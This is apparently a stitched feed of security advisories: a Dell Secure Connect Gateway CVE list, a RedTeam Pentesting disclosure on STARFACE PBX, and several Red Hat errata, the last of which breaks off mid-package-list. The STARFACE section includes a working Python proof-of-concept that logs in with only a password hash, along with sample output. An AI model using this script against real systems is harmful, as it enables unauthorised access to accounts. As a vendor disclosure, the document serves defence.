
Dell SCG 5.14 contains an information disclosure vulnerability during the SRS to SCG upgrade path. A remote low privileged malicious user could potentially exploit this vulnerability to retrieve the plain text.



**Third-Party Component**  
  **CVEs** **More information**     This hyperlink is taking you to a website outside of Dell Technologies Apache CVE-2021-37533 https://nvd.nist.gov/vuln/detail/CVE-2021-37533 CVE-2022-40146 https://www.suse.com/security/cve/CVE-2022-40146.html CVE-2023-25690 https://www.suse.com/security/cve/CVE-2023-25690.html CVE-2023-27522 https://www.suse.com/security/cve/CVE-2023-27522.html CVE-2022-42252  
  CVE-2022-42252 | SUSE CVE-2023-24998 CVE-2023-24998 | SUSE CVE-2023-28708  
  NVD - CVE-2023-28708 (nist.gov) WoodStox CVE-2022-40152  
  CVE-2022-40152 | SUSE Json CVE-2023-1370  
  NVD - CVE-2023-1370 (nist.gov) CVE-2022-45688  
  NVD - CVE-2022-45688 (nist.gov) Curl CVE-2023-27533 https://www.suse.com/security/cve/CVE-2023-27533.html CVE-2023-27534 https://www.suse.com/security/cve/CVE-2023-27534.html CVE-2023-27535 https://www.suse.com/security/cve/CVE-2023-27535.html CVE-2023-27536 https://www.suse.com/security/cve/CVE-2023-27536.html CVE-2023-27538 https://www.suse.com/security/cve/CVE-2023-27538.html Java CVE-2022-21619 https://www.suse.com/security/cve/CVE-2022-21619.html CVE-2022-21624 https://www.suse.com/security/cve/CVE-2022-21624.html CVE-2022-21626 https://www.suse.com/security/cve/CVE-2022-21626.html CVE-2022-21628 https://www.suse.com/security/cve/CVE-2022-21628.html Jettison CVE-2022-40149 https://www.suse.com/security/cve/CVE-2022-40149.html CVE-2022-40150 https://www.suse.com/security/cve/CVE-2022-40150.html CVE-2022-45685 https://www.suse.com/security/cve/CVE-2022-45685.html CVE-2022-45693 https://www.suse.com/security/cve/CVE-2022-45693.html CVE-2023-1436  
  CVE-2023-1436 | SUSE Kernel CVE-2017-5754 https://www.suse.com/security/cve/CVE-2017-5754.html CVE-2021-4203 https://www.suse.com/security/cve/CVE-2021-4203.html CVE-2022-2991 https://www.suse.com/security/cve/CVE-2022-2991.html CVE-2022-4129 https://www.suse.com/security/cve/CVE-2022-4129.html CVE-2022-4662 https://www.suse.com/security/cve/CVE-2022-4662.html CVE-2022-36280 https://www.suse.com/security/cve/CVE-2022-36280.html CVE-2022-38096 https://www.suse.com/security/cve/CVE-2022-38096.html CVE-2022-47929 https://www.suse.com/security/cve/CVE-2022-47929.html CVE-2023-0045 https://www.suse.com/security/cve/CVE-2023-0045.html CVE-2023-0266 https://www.suse.com/security/cve/CVE-2023-0266.html CVE-2023-0590 https://www.suse.com/security/cve/CVE-2023-0590.html CVE-2023-0597 https://www.suse.com/security/cve/CVE-2023-0597.html CVE-2023-1118 https://www.suse.com/security/cve/CVE-2023-1118.html CVE-2023-23559 https://www.suse.com/security/cve/CVE-2023-23559.html CVE-2023-26545 https://www.suse.com/security/cve/CVE-2023-26545.html libbind9-161  CVE-2022-2795  https://www.suse.com/security/cve/CVE-2022-2795.html CVE-2022-38177  https://www.suse.com/security/cve/CVE-2022-38177.html CVE-2022-38178 https://www.suse.com/security/cve/CVE-2022-38178.html Openssl CVE-2022-4450 https://www.suse.com/security/cve/CVE-2022-4450.html CVE-2023-0215 https://www.suse.com/security/cve/CVE-2023-0215.html CVE-2023-0464 https://www.suse.com/security/cve/CVE-2023-0464.html CVE-2023-0465 https://www.suse.com/security/cve/CVE-2023-0465.html CVE-2023-0466 https://www.suse.com/security/cve/CVE-2023-0466.html Python CVE-2022-45061 https://www.suse.com/security/cve/CVE-2022-45061.html CVE-2023-24329 https://www.suse.com/security/cve/CVE-2023-24329.html Springframework CVE-2022-22950 https://nvd.nist.gov/vuln/detail/CVE-2022-22950 CVE-2022-22970 https://nvd.nist.gov/vuln/detail/CVE-2022-22970 CVE-2022-22971 https://nvd.nist.gov/vuln/detail/CVE-2022-22971 CVE-2023-20861  
  NVD - CVE-2023-20861 (nist.gov) CVE-2023-20863  
  NVD - CVE-2023-20863 (nist.gov) CVE-2023-20873  
  NVD - CVE-2023-20873 (nist.gov) TAR CVE-2022-48303 https://www.suse.com/security/cve/CVE-2022-48303.html libapr-util1 CVE-2022-25147 https://www.suse.com/security/cve/CVE-2022-25147.html libpcre2-8-0 CVE-2022-1587 https://www.suse.com/security/cve/CVE-2022-1587.html libX11 CVE-2022-3555 https://www.suse.com/security/cve/CVE-2022-3555.html libxslt1 CVE-2021-30560 https://www.suse.com/security/cve/CVE-2021-30560.html TCL  
  suse-su-20223653-1  
  https://www.suse.com/pt-br/support/update/announcement/2022/suse-su-20223653-1/

CVE-2023-28043: DSA-2023-164: Dell Secure Connect Gateway Security Update for Multiple Vulnerabilities

RedTeam Pentesting discovered that the web interface of STARFACE as well as its REST API allows authentication using the SHA512 hash of the password instead of the cleartext password. While storing password hashes instead of cleartext passwords in an application's database generally has become best practice to protect users' passwords in case of a database compromise, this is rendered ineffective when allowing to authenticate using the password hash. Versions 7.3.0.10 and below are affected.

    Advisory: STARFACE: Authentication with Password Hash PossibleRedTeam Pentesting discovered that the web interface of STARFACE as wellas its REST API allows authentication using the SHA512 hash of thepassword instead of the cleartext password. While storing passwordhashes instead of cleartext passwords in an application's databasegenerally has become best practice to protect users' passwords in caseof a database compromise, this is rendered ineffective when allowing toauthenticate using the password hash.Details=======Product: STARFACEAffected Versions: 7.3.0.10 and earlier versionsFixed Versions: -Vulnerability Type: Broken AuthenticationSecurity Risk: lowVendor URL: https://www.starface.deVendor Status: notifiedAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-004Advisory Status: publishedCVE: CVE-2023-33243CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33243Introduction============"When functionality and comfort come together, the result is astate-of-the-art experience that we've dubbed 'comfortphoning'. It's asecure, scalable digital communication solution that meets every needand wish. STARFACE is easy to integrate into existing IT systems andflexibly grows with your requirements."(from the vendor's homepage)More Details============The image of STARFACE PBX [0] in version 7.3.0.10 can be downloaded fromthe vendor's homepage [1]. The included files can be further examined byeither extracting the contents or running the image in a virtualmachine. The web interface of the PBX uses the JavaScript file at thefollowing path to submit the login form:------------------------------------------------------------------------js/prettifier.js------------------------------------------------------------------------The following two lines of the JavaScript file "prettifier.js" add thetwo parameters "secret" and "ack" to the form before being submitted:------------------------------------------------------------------------$form(document.forms[0]).add('secret', createHash(defaultVals.isAd, liv, lpv, defaultVals.k + defaultVals.bk));$form(document.forms[0]).add('ack', defaultVals.k);------------------------------------------------------------------------The JavaScript object "defaultVals" is included in the web application'ssource text. While the value of "defaultVals.k" was found to be thestatic hash of the PBX version, the value of "defaultVals.bk" contains anonce only valid for the currently used session. Therefore, the formparameter "ack" is always the same value. For the form value "secret"the function "createHash()" is called with different arguments. Thevalue of "defaultVals.isAd" is set to "false" when login via ActiveDirectory is disabled. The parameters "liv" and "lpv" contain theusername and password entered into the form respectively.------------------------------------------------------------------------const createHash = function (isAD, user, pass, nonces) {    if (isAD) {        return forAD.encode(user + nonces + pass);    }    return user + ':' + forSF(user + nonces + forSF(pass));};------------------------------------------------------------------------The expression right after the second return statement is theimplementation used when Active Directory login is disabled which is thedefault setting. The return value is composed of the username separatedvia a colon from a value built using the "forSF()" function. The"forSF()" function was found to calculate the SHA512 hash value. Whenconsidering the arguments passed to the function, the hash is calculatedas follows:------------------------------------------------------------------------SHA512(username + defaultVals.k + defaultVals.bk + SHA512(password))------------------------------------------------------------------------As can be seen, instead of the cleartext password the SHA512 hash of thepassword is used in the calculation. In conclusion, for the form value"secret" the following value is transmitted:------------------------------------------------------------------------username + ":" + SHA512(  username + defaultVals.k + defaultVals.bk + SHA512(password))------------------------------------------------------------------------If the SHA512 hash of a user's password is known, it can be directlyused in the calculation of the "secret" during the login process.Knowledge of the cleartext password is not required.This finding was also verified by analysing the decompiled Java code ofthe server component. It was also found that the authentication processof the REST API is vulnerable in a very similar manner.Proof of Concept================The following Python script can be used to perform a login by specifyinga target URL, a username and the associated password hash:------------------------------------------------------------------------#!/usr/bin/env python3import clickimport hashlibimport reimport requestsimport typingdef get_values_from_session(url, session) -> typing.Tuple[str, str]:    k, bk = "", ""    response_content = session.get(f"{url}/jsp/index.jsp").text    k_result = re.search("\sk : '([^']+)'", response_content)    bk_result = re.search("\sbk : '([^']+)'", response_content)    if k_result != None:        k = k_result.group(1)    if bk_result != None:        bk = bk_result.group(1)    return k, bkdef web_login(url, login, pwhash, session) -> bool:    version, nonce = get_values_from_session(url, session)    if version == "" or nonce == "":        print("Web Login failed: Nonce and version hash can not be retrieved.")        return    value = login + version + nonce + pwhash    secret = hashlib.sha512(value.encode("utf-8")).hexdigest()    data = {        "forward": "",        "autologin": "false",        "secret": f"{login}:{secret}",        "ack": version,    }    login_request = session.post(        f"{url}/login",        data=data,        allow_redirects=False,        headers={"Referer": f"{url}/jsp/index.jsp"},    )    response_headers = login_request.headers    if "Set-Cookie" in response_headers:        session_id = response_headers["Set-Cookie"].split("=")[1].split(";")[0]        print(f"Session ID: {session_id}")        return True    else:        print("Invalid login data")        return Falsedef get_nonce_from_api(url, session) -> str:    response_content = session.get(f"{url}/rest/login").json()    return response_content["nonce"] if "nonce" in response_content else ""def rest_login(url, login, pwhash, session):    nonce = get_nonce_from_api(url, session)    if nonce == "":        print("REST Login failed: Nonce can not be retrieved.")        return    value = login + nonce + pwhash    secret = hashlib.sha512(value.encode("utf-8")).hexdigest()    data = {"loginType": "Internal", "nonce": nonce, "secret": f"{login}:{secret}"}    login_request = session.post(        f"{url}/rest/login",        json=data,        headers={"Content-Type": "application/json", "X-Version": "2"},    )    response_data = login_request.json()    token = response_data["token"] if "token" in response_data else "none"    print(f"REST API Token: {token}")@click.command()@click.option('--url', help='Target System URL', required=True)@click.option('--login', help='Login ID', required=True)@click.option('--pwhash', help='Password Hash', required=True)def login(url, login, pwhash):    session = requests.session()    stripped_url = url.rstrip("/")    result = web_login(stripped_url, login, pwhash, session)    if result:        rest_login(stripped_url, login, pwhash, session)if __name__ == "__main__":    login()------------------------------------------------------------------------For example, the SHA512 hash of the password "starface" can becalculated as follows:------------------------------------------------------------------------$ echo -n "starface" | sha512suma37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec -------------------------------------------------------------------------The Python script can be run as follows to perform a login as the user"0001" with the aforementioned hash:------------------------------------------------------------------------$ python3 login.py --url 'https://www.example.com' --login 0001 --pwhash'a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec'Session ID: 2CF09656E274F000FFAD023AF37629CEREST API Token: 51eef8f8vp3d3u81k0imjbuuu7------------------------------------------------------------------------When the password hash is valid for the specified user of the targetedinstance a session ID as well as a REST API token is returned.Afterwards, these values can be used to interact with the webapplication and the REST API.Workaround==========NoneFix===On 4 May 2023, version 8.0.0.11 was released. In this version thevulnerability was addressed with a temporary solution, such that thepassword hashes are encrypted before they are saved in the database.This approach prevents attackers from exploiting this vulnerability inscenarios where they have only acquired pure database access. However,attackers with system level access can bypass this temporary measure asthey can extract the encryption key and decrypt the hashes in thedatabase. A solution that fixes this vulnerability entirely is still inprogress.Security Risk=============The web interface and REST API of STARFACE allow to login using thepassword hash instead of the cleartext password. This can be exploitedby attackers who gained access to the application's database where thepasswords are also saved as a SHA512 hash of the cleartext passwords.While the precondition for this attack could be the full compromise ofthe STARFACE PBX, another attack scenario could be that attackersacquire access to backups of the database stored on another system.Furthermore, the login via password hash allows attackers for permanentunauthorised access to the web interface even if system access wasobtained only temporarily. Due to the prerequisites of obtaining accessto password hashes, the vulnerability poses a low risk only.Timeline========2022-12-06 Vulnerability identified2022-12-13 Customer approved disclosure to vendor2023-01-11 Vendor notified2023-05-04 Vendor released new version 8.0.0.112023-05-19 CVE ID requested2023-05-20 CVE ID assigned2023-06-01 Advisory releasedReferences==========[0] https://starface.com/en/products/comfortphoning/[1] https://knowledge.starface.de/pages/viewpage.action?pageId=46564694RedTeam Pentesting GmbH=======================RedTeam Pentesting offers individual penetration tests performed by ateam of specialised IT-security experts. Hereby, security weaknesses incompany networks or products are uncovered and can be fixed immediately.As there are only few experts in this field, RedTeam Pentesting wants toshare its knowledge and enhance the public knowledge with research insecurity-related areas. The results are made available as publicsecurity advisories.More information about RedTeam Pentesting can be found at:https://www.redteam-pentesting.de/Working at RedTeam Pentesting=============================RedTeam Pentesting is looking for penetration testers to join our teamin Aachen, Germany. If you are interested please visit:https://jobs.redteam-pentesting.de/-- RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0Alter Posthof 1                           Fax : +49 241 510081-9952062 Aachen                    https://www.redteam-pentesting.deGermany                         Registergericht: Aachen HRB 14004Geschäftsführer:                       Patrick Hof, Jens Liebchen

STARFACE 7.3.0.10 Broken Authentication

Red Hat Security Advisory 2023-3397-01 - QATzip is a user space library which builds on top of the Intel QuickAssist Technology user space library, to provide extended accelerated compression and decompression services by offloading the actual compression and decompression request to the Intel Chipset Series. Issues addressed include a privilege escalation vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: qatzip security and bug fix update  
Advisory ID:       RHSA-2023:3397-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3397  
Issue date:        2023-05-31  
CVE Names:         CVE-2022-36369   
=====================================================================

1. Summary:

An update for qatzip is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.8.6) - x86_64  
Red Hat Enterprise Linux AppStream EUS (v.8.6) - x86_64

3. Description:

QATzip is a user space library which builds on top of the Intel QuickAssist  
Technology user space library, to provide extended accelerated compression  
and decompression services by offloading the actual compression and  
decompression request(s) to the Intel Chipset Series. QATzip produces data  
using the standard gzip* format (RFC1952) with extended headers. The data  
can be decompressed with a compliant gzip* implementation. QATzip is  
designed to take full advantage of the performance provided by Intel  
QuickAssist Technology.

Security Fix(es):

* qatzip: local privilege escalation (CVE-2022-36369)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Intel QAT Update - QATzip (User Space Changes) (BZ#2178769)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2170784 - CVE-2022-36369 qatzip: local privilege escalation

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
qatzip-1.1.2-1.el8_6.src.rpm

x86_64:  
qatzip-1.1.2-1.el8_6.x86_64.rpm  
qatzip-debuginfo-1.1.2-1.el8_6.x86_64.rpm  
qatzip-debugsource-1.1.2-1.el8_6.x86_64.rpm  
qatzip-libs-1.1.2-1.el8_6.x86_64.rpm  
qatzip-libs-debuginfo-1.1.2-1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.8.6):

x86_64:  
qatzip-debuginfo-1.1.2-1.el8_6.x86_64.rpm  
qatzip-debugsource-1.1.2-1.el8_6.x86_64.rpm  
qatzip-devel-1.1.2-1.el8_6.x86_64.rpm  
qatzip-libs-debuginfo-1.1.2-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-36369  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZHeVGNzjgjWX9erEAQhiBg/+Kdi4KI3mxbLUlYGGHL4b6t3SaiWQ+0uO  
glCxzVohlRnJGPk/sqw8lQjWay0qv6A+cHC1hwgJPEXzABywYymH/fJls8NP1eJB  
vLrRvme4yyt0uebsFlqnydvt9bzK7hIlKc2O0ZNcnUPiXzSpjf2LotT3dkdK4ZpS  
5qOd0JjmP3F1tVnVeKFE49jTR8cWj9R0sTEKjbNINCWKIZ3jCY2/UapAPPYZ0CGe  
VY1rlbT7WxdBvZelroY8fpzm9um3LwMFrwNtnbno3ID0iWNcd/j8OBXpO+zU8akq  
VJmLJqAhglZiXiVOCCILynq5uibgnvR1SuWLS2/Q+kGR1LhiQ+4pR4z/4MKsP0SB  
wDBA0vfOICE/At8dL2S/PY/WrsNFj/NW5HJPAs1NVAF5kis4ywR93wn5QeTeh2GM  
XEGoUMECj+FoHONaFNMw9ZXEImjuz2tTakDQ9TSQDI4of1YhbrVKkEt5WP+1jGUT  
HcHuni/e3phCwYHfQAKGDeYm1WiEj0RVaQC0kCvXcxGPMBLTZq14EPw2ToBBxDgu  
Ztfuqscm9GXTaA/AWg03+n1VC8HLCBdj9b0aRDEAJ/pZX5L/VLs2FXpDVvJb5pmg  
qhZ5NWr6JpdS75+eha1a+EYqtGWY51DyL8dn2EdkqE+pxjs8MaSvQztfDGL+/knI  
b17/1oNf6T0=  
=XDe1  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3397-01

Red Hat Security Advisory 2023-3394-01 - The Public Key Infrastructure Core contains fundamental packages required by Red Hat Certificate System.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: pki-core:10.6 security update  
Advisory ID:       RHSA-2023:3394-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3394  
Issue date:        2023-05-31  
CVE Names:         CVE-2022-2393 CVE-2022-2414   
=====================================================================

1. Summary:

An update for the pki-core:10.6 module is now available for Red Hat  
Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The Public Key Infrastructure (PKI) Core contains fundamental packages  
required by Red Hat Certificate System.

Security Fix(es):

* pki-core: access to external entities when parsing XML can lead to XXE  
(CVE-2022-2414)

* pki-core: When using the caServerKeygen_DirUserCert profile, user can get  
certificates for other UIDs by entering name in Subject field  
(CVE-2022-2393)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2101046 - CVE-2022-2393 pki-core: When using the caServerKeygen_DirUserCert profile, user can get certificates for other UIDs by entering name in Subject field  
2104676 - CVE-2022-2414 pki-core: access to external entities when parsing XML can lead to XXE

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
jss-4.9.3-1.module+el8.6.0+14244+60d461b7.src.rpm  
ldapjdk-4.23.0-1.module+el8.5.0+11983+6ba118b4.src.rpm  
pki-core-10.12.7-1.module+el8.6.0+18623+dea80f17.src.rpm  
tomcatjss-7.7.1-1.module+el8.6.0+13291+248751b1.src.rpm

aarch64:  
jss-4.9.3-1.module+el8.6.0+14244+60d461b7.aarch64.rpm  
jss-debuginfo-4.9.3-1.module+el8.6.0+14244+60d461b7.aarch64.rpm  
jss-debugsource-4.9.3-1.module+el8.6.0+14244+60d461b7.aarch64.rpm  
jss-javadoc-4.9.3-1.module+el8.6.0+14244+60d461b7.aarch64.rpm  
pki-core-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.aarch64.rpm  
pki-core-debugsource-10.12.7-1.module+el8.6.0+18623+dea80f17.aarch64.rpm  
pki-symkey-10.12.7-1.module+el8.6.0+18623+dea80f17.aarch64.rpm  
pki-symkey-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.aarch64.rpm  
pki-tools-10.12.7-1.module+el8.6.0+18623+dea80f17.aarch64.rpm  
pki-tools-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.aarch64.rpm

noarch:  
ldapjdk-4.23.0-1.module+el8.5.0+11983+6ba118b4.noarch.rpm  
ldapjdk-javadoc-4.23.0-1.module+el8.5.0+11983+6ba118b4.noarch.rpm  
pki-acme-10.12.7-1.module+el8.6.0+18623+dea80f17.noarch.rpm  
pki-base-10.12.7-1.module+el8.6.0+18623+dea80f17.noarch.rpm  
pki-base-java-10.12.7-1.module+el8.6.0+18623+dea80f17.noarch.rpm  
pki-ca-10.12.7-1.module+el8.6.0+18623+dea80f17.noarch.rpm  
pki-kra-10.12.7-1.module+el8.6.0+18623+dea80f17.noarch.rpm  
pki-server-10.12.7-1.module+el8.6.0+18623+dea80f17.noarch.rpm  
python3-pki-10.12.7-1.module+el8.6.0+18623+dea80f17.noarch.rpm  
tomcatjss-7.7.1-1.module+el8.6.0+13291+248751b1.noarch.rpm

ppc64le:  
jss-4.9.3-1.module+el8.6.0+14244+60d461b7.ppc64le.rpm  
jss-debuginfo-4.9.3-1.module+el8.6.0+14244+60d461b7.ppc64le.rpm  
jss-debugsource-4.9.3-1.module+el8.6.0+14244+60d461b7.ppc64le.rpm  
jss-javadoc-4.9.3-1.module+el8.6.0+14244+60d461b7.ppc64le.rpm  
pki-core-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.ppc64le.rpm  
pki-core-debugsource-10.12.7-1.module+el8.6.0+18623+dea80f17.ppc64le.rpm  
pki-symkey-10.12.7-1.module+el8.6.0+18623+dea80f17.ppc64le.rpm  
pki-symkey-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.ppc64le.rpm  
pki-tools-10.12.7-1.module+el8.6.0+18623+dea80f17.ppc64le.rpm  
pki-tools-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.ppc64le.rpm

s390x:  
jss-4.9.3-1.module+el8.6.0+14244+60d461b7.s390x.rpm  
jss-debuginfo-4.9.3-1.module+el8.6.0+14244+60d461b7.s390x.rpm  
jss-debugsource-4.9.3-1.module+el8.6.0+14244+60d461b7.s390x.rpm  
jss-javadoc-4.9.3-1.module+el8.6.0+14244+60d461b7.s390x.rpm  
pki-core-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.s390x.rpm  
pki-core-debugsource-10.12.7-1.module+el8.6.0+18623+dea80f17.s390x.rpm  
pki-symkey-10.12.7-1.module+el8.6.0+18623+dea80f17.s390x.rpm  
pki-symkey-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.s390x.rpm  
pki-tools-10.12.7-1.module+el8.6.0+18623+dea80f17.s390x.rpm  
pki-tools-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.s390x.rpm

x86_64:  
jss-4.9.3-1.module+el8.6.0+14244+60d461b7.x86_64.rpm  
jss-debuginfo-4.9.3-1.module+el8.6.0+14244+60d461b7.x86_64.rpm  
jss-debugsource-4.9.3-1.module+el8.6.0+14244+60d461b7.x86_64.rpm  
jss-javadoc-4.9.3-1.module+el8.6.0+14244+60d461b7.x86_64.rpm  
pki-core-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.x86_64.rpm  
pki-core-debugsource-10.12.7-1.module+el8.6.0+18623+dea80f17.x86_64.rpm  
pki-symkey-10.12.7-1.module+el8.6.0+18623+dea80f17.x86_64.rpm  
pki-symkey-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.x86_64.rpm  
pki-tools-10.12.7-1.module+el8.6.0+18623+dea80f17.x86_64.rpm  
pki-tools-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2393  
https://access.redhat.com/security/cve/CVE-2022-2414  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZHeVAtzjgjWX9erEAQiB2A//QrQfE2CNEk7MqCukaj0nDVJwAS+V/BXU  
Z6Q1nmjxSz4BI7H8A9TKhFP1hHaovouYOxgnUnos3qEVZBnr49yjokB3wABT+UG0  
MZ7Czc9k8LT0RlBa4yIJYvnqXPoAnsXa6LBpjOmSRvNlMucK54GdNjgV9XrdOXnA  
IFHWn+Rg5/tJxBaMOcxBsnbWCAebvAT+mQakh4bDgWsCRWtJqTSogKmnKAPaTNx/  
8UQWaxfrk/7usDvoDvZUaMqbzsA5Nr+pPuGqD6h6OkC0RuBMAG3D99YPrryglmWG  
D6afkZAIPX+lNoIL2pJA2Tm2pUsHq34dgk6CCm+H7BYeHlbc4QiW+vmdxu750YuX  
I/vDilrjsDI4fxvSFt52zBdLWvPZX8Se/Pb6pJF7nziU2uSYYlatiNRLEYiP0HZc  
oebOd0GL1QBM/Ny9c+6DemHDlgc4giUmpTZGt0kVMeSkEJMnLRPf6OwXq7qDYm8J  
5iB3qUISIkS2D0fAxFqOaaLE3cgdDA/PtZFu7P5weX8maEbtd/VvuiWWts/hw9YZ  
Zim7MhHLMccepUyZkGF2kCQ01q6D7tPhHYa4t2SDObZsIag5oXoZ7cgBGD6I/AfB  
uB27gnx7Jep1J0NReNjkmSb3uWJgIXk9QmIy56o/BzTeIIcPHzWsiV3bG8a29pxu  
PeBQd7wCAIs=  
=LxBB  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3394-01

Red Hat Security Advisory 2023-3388-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include bypass and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security, bug fix, and enhancement update  
Advisory ID:       RHSA-2023:3388-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3388  
Issue date:        2023-05-31  
CVE Names:         CVE-2022-3564 CVE-2022-4378 CVE-2022-39188   
                   CVE-2022-42703   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.8.6) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.8.6) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: use-after-free caused by l2cap_reassemble_sdu() in  
net/bluetooth/l2cap_core.c (CVE-2022-3564)

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

* kernel: unmap_mapping_range() race with munmap() on VM_PFNMAP mappings  
leads to stale TLB entry (CVE-2022-39188)

* kernel: use-after-free related to leaf anon_vma double reuse  
(CVE-2022-42703)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* An application stopped on robust futex used via pthread_mutex_lock()  
(BZ#2170055)

* dm crypt: backport flags to optionally bypass kcryptd workqueues  
(BZ#2175202)

* The qede driver changes rx-usecs: to 256 causing performance impact  
(BZ#2176106)

* Intel QAT Update - (kernel changes) (BZ#2176852)

* Concurrent NVMe scans cause panic with native multipath (BZ#2178244)

* CNB: Update TC subsystem to upstream v5.18 (BZ#2179432)

* Server crashed in  cifs_reconnect -> dfs_cache_free_tgts (BZ#2182082)

* WARNING: possible circular locking dependency detected  
cpu_partial_store+0x44/0x80 (BZ#2184771)

* "smpboot: Scheduler frequency invariance went wobbly, disabling!" on  
nohz_full CPUs after long run (BZ#2188069)

* kernel-rt: task deadline_test:2526 blocked for more than 600 seconds.  
(BZ#2188625)

* gfs2: file corruption in large data files (BZ#2188687)

Enhancement(s):

* Add support for no HWP mode into intel_pstate for Sapphire Rapids (SPR)  
(BZ#2178644)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130141 - CVE-2022-39188 kernel: unmap_mapping_range() race with munmap() on VM_PFNMAP mappings leads to stale TLB entry  
2133483 - CVE-2022-42703 kernel: use-after-free related to leaf anon_vma double reuse  
2150999 - CVE-2022-3564 kernel: use-after-free caused by l2cap_reassemble_sdu() in net/bluetooth/l2cap_core.c  
2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.6):

Source:  
kernel-4.18.0-372.57.1.el8_6.src.rpm

aarch64:  
bpftool-4.18.0-372.57.1.el8_6.aarch64.rpm  
bpftool-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
